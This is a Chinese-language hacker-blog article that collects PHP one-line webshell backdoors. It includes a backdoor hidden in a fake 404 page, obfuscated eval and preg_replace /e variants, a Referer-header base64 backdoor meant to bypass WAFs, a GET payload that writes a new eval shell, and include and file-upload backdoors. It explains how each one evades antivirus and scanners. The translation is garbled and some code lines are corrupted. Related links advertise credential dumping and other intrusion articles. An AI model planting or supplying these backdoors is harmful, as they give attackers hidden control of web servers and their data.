PHP一句话木马全集

hacker4年前黑客文章653

因为PHP一句话木马可以说有很多,简易的、中等水平的、繁杂的.......,今日主要是共享一些较为强大的一些PHP一句话木马全集;

 

一、运用404错误页掩藏PHP小龙

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>

运用方式:

404错误页是网址常见的文档,一般提议好后非常少许多人想去对它开展查验改动,这时候我们可以运用这一点开展掩藏侧门。

 

二、无特点掩藏PHP一句话

<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');

运用方式:

将$_POST['code']的內容取值给$_SESSION['theCode'],随后实行$_SESSION['theCode'],闪光点是沒有特征码。用漏洞扫描工具来查验编码得话,是不容易警报的,做到目地了。

 

三、非常隐敝的PHP侧门

<?php $_GET[a]($_GET[b]);?>

仅用GET涵数就组成了木马病毒;

运用方式:

?a=assert&b=${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))};

实行后当前目录转化成c.php一句话木马,当传参a为eval时候出错木马病毒转化成不成功,为assert时一样出错,但会转化成木马病毒,真可以说不能小看,很简单的一句话,被拓宽到如此运用。

 

四、等级恳求,编号运作PHP侧门

此方式用2个文档完成,文档1:

<?php
//1.php
header('Content-type:text/html;charset=utf-8');
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10' && count($a) == 9) {
   eval(base64_decode(str_replace(" ", " ", implode(array_slice($a, 6)))));
}

文档2:

<?php
//2.php
header('Content-type:text/html;charset=utf-8');
//要实行的编码
$code = <<<CODE
phpinfo();
CODE;
//开展base64编号
$code = base64_encode($code);
//结构referer字符串数组
$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//侧门url
$url = 'http://localhost/test1/1.php';
$ch = curl_init();
$options = array(
    CURLOPT_URL => $url,
    CURLOPT_HEADER => FALSE,
    CURLOPT_RETURNTRANSFER => TRUE,
    CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echo curl_exec($ch);

运用方式:

根据HTTP恳求中的HTTP_REFERER来运作历经base64编号的编码,来做到侧门的实际效果,一般waf对referer这种检验要松一点,或是沒有检验。用这一构思bypass waf非常好。

 

五、PHP侧门转化成专用工具weevely

weevely是一款对于PHP的webshell的自由软件,可用以仿真模拟一个类似telnet的联接shell,weevely一般 用以web程序流程的漏洞检测,掩藏侧门或是应用相近telnet的 *** 来替代web 网页页面式的管理 *** ,weevely转化成的服务端php代码是历经了base64编号的,因此能够骗得流行的电脑杀毒软件和IDS,提交服务端编码后一般 能够根据weevely立即运作。

 

weevely所转化成的PHP侧门所应用的方式是如今较为流行的base64数据加密融合字符串数组形变技术性,侧门中所应用的涵数均是常见的字符串数组处理函数,被做为查验标准的eval,system等涵数都不容易立即出現在编码中,进而能够导致侧门文档绕开侧门搜索专用工具的查验。应用暗组的Web侧门杀毒专用工具开展扫描仪,数据显示该文件无一切威协。

PHP侧门转化成专用工具weevely

 

六、三个形变的一句话PHP木马病毒

之一个:

<?php ([email protected]
$_GET[2])[email protected]$_($_POST[1])?>

在水果刀里写 http://site/1.php?2=assert 登陆密码是1;

 

第二个:

<?php
$_="";
$_[ ""]='';
$_="$_"."";
$_=($_[ ""]|"").($_[ ""]|"").($_[ ""]^"");
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>

在水果刀里写 http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass。假如你用水果刀的额外数据信息得话更隐敝,或是用其他注入专用工具还可以,由于是post递交的。

 

第三个:

($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');

str_rot13(‘riny’)即编号后的eval,彻底绕开了关键词,又无失实际效果,令人呕血!

 

七、六个高級的PHP一句话木马侧门

之一个:水果刀一句话

<?php
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");

 

第二个:风险的include涵数,立即编译程序一切文档为php格式运作

<?php
$filename=$_GET['xbid'];
include ($filename);

 

第三个:重新命名一切文档

<?php
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);

 

第四个:水果刀一句话

<?php
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");

 

第五个:风险的include涵数,立即编译程序一切文档为php格式运作,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif;gif插一句话;

<?php
include ($uid);

 

第六个:八个典型性的PHP一句话木马(程序流程侧门编码)

1、

<?php eval_r($_POST[ *** ])?>

2、

<?php @eval_r($_POST[ *** ])?>
//容错机制编码

3、

<?php assert($_POST[ *** ]);?>
//应用lanker一句话手机客户端的权威专家方式实行有关的php句子

4、

<?$_POST['sa']($_POST[' *** ']);?>

5、

<?$_POST['sa']($_POST[' *** '],$_POST['sc'])?>

6、

<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//应用这一后,应用水果刀一句话手机客户端在配备联接的情况下在"配备"一栏键入

7、

<O>[email protected]_r($_POST1);</O>

8、

<script language="php">@eval_r($_POST[ *** ])</script>
//绕开<?限定的一句话
标签: 黑客技术

相关文章

科讯kesioncms 5.5以下漏洞后台拿shell

科讯kesioncms 5.5以下漏洞后台拿shell

科讯做为一个强大的cms程序大多被政府和教育机构网站所使用,关于科讯的漏洞利用教程网上不是很多。由于科讯的后台登陆需要输入认证码,而认证码没有保存在数据库而是保存在asp文件中,所以在某种程度上增...

JohnRipper是“最后的”登陆密码黑客工具!专用工

JohnRipper是“最后的”登陆密码黑客工具!专用工

什么叫John the Ripper? John the Ripper是最著名的密码破解(网络黑客)专用工具,这就是为何它一直在大家的“十大黑客工具”中。除开有有含义的名字,大家喜爱John the...

网站渗透,教你让ATM机一直吐钱

网站渗透,教你让ATM机一直吐钱

去年夏天,一名土尔其中国公民Ercan Findikoglu被引渡回国到英国,而现阶段,他将遭遇着纽约市审判长明确提出的18项罪行控告。   土尔其近些...

绕过杀毒软件抓取windows密码

 使用procdump,由于是微软的东西,带微软签名杀软不会报毒。 procdump -accepteula -ma lsass.exe lsass.dmp copy出 ls...

SQLSERVER高级注入技巧

前言: 即是高级技巧,其它基本的注入方法就不详述了。 看不懂可查本站的注入基础文章。 为了更好的用好注入,建议大家看看本站的SQL语法相关文章 [获取全部数据库名] select name...

XSS技术专业表述

XSS技术专业表述

先给大伙说一下XSS的技术专业表述吧!   什么叫XSS进攻? 每每程序运行的新网页页面中包括不会受到信赖的、未历经适当认证或转义的数据信息,或是应用能够建立JavaScript 的电脑浏...